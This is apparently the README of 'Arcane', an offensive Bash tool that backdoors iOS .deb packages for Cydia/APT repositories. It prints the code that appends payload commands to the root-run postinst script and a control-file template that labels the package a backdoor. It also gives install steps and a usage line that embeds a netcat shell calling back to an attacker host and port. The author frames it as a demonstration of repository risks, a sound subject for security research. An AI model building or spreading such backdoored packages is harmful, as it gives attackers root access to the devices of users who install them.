tokyoneon/Arcane
Arcane is a simple script designed to backdoor iOS packages (iphoneos-arm) and create the necessary resources for APT repositories. It was created for this publication to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.
To understand what's happening in the GIF, decompress a package created with Arcane.
```bash
dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp
```
Notice the `control` and `postinst` files in the `DEBIAN` directory. Both files are important.

```
tree /tmp/whois-decomp/
/tmp/whois-decomp/
├── DEBIAN
│   ├── control
│   └── postinst
└── usr
    └── bin
        └── whois
```
It's possible to supply scripts as part of a package that run when the application is installed or removed. Package maintainer scripts include the `preinst`, `postinst`, `prerm`, and `postrm` files. Arcane takes advantage of the `postinst` file to execute commands during the installation; dpkg runs it as root, so whatever is appended to it runs with full privileges on the device.
```bash
# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the file.
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor () {
    # If --file is used, `cat` the command(s) into the postinst file.
    if [[ "$infile" ]]; then
        cat "$infile" >> "$postinst";
        embed="[$infile]";
    else
        # If no --file, utilize the simple Bash payload, previously
        # defined.
        echo -e "$payload" >> "$postinst";
        embed="generic shell command";
    fi;
    status "embedded $embed into postinst" "error embedding backdoor";
    # Maintainer scripts must be executable or dpkg will not run them.
    chmod 0755 "$postinst"
};
```
The `control` file contains the metadata fields (package name, version, architecture, maintainer) that package management tools use when installing packages. Arcane will either modify an existing `control` file or create one from a template.
```bash
# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker <https://$hacker.github.io/>
Maintainer: $hacker <https://$hacker.github.io/>";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
    # If no control is detected, create it using the template.
    echo "$controlTemp" > "$tmp/DEBIAN/control";
    status "created control file" "error with control template";
else
    # If a control file exists, Arcane will simply rename the package
    # as it appears in the list of available Cydia applications. This
    # makes the package easier to locate in Cydia.
    msg "detected control file" succ;
    sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
    status "modified control file" "error with control";
fi;
```
Clone the repository in Kali v2020.3.
```bash
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies
sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane
chmod +x arcane.sh; ./arcane.sh --help
```
Embed a command into a given package. See the article for more info.

```bash
./arcane.sh --input samples/sed_4.5-1_iphoneos-arm.deb --lhost <attacker> --lport <4444> --cydia --netcat
```
The repo includes packages for testing.
```
ls -la samples/
-rw-r--r-- 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  76688 Aug 29  2018 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  60866 Jul  8 21:03 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root  13810 Aug 29  2018 whois_5.3.2-1_iphoneos-arm.deb
```
MD5 sums, as found on the official Bingner repository. These only confirm that the samples are unmodified copies of the upstream packages; a malicious repository publishes hashes that match its own backdoored builds, so a checksum from the repo itself does not detect this attack.

```
md5sum samples/*.deb
3f1712964701580b3f018305a55e217c  samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
795ccf9c6d53dd60d2f74f7a601f474f  samples/network-cmds_543-1_iphoneos-arm.deb
a020882dac121afa4b03c63304d729b0  samples/sed_4.5-1_iphoneos-arm.deb
38db275007a331e7ff8899ea22261dc7  samples/top_39-2_iphoneos-arm.deb
b40ee800b72bbac323568b36ad67bb16  samples/whois_5.3.2-1_iphoneos-arm.deb
```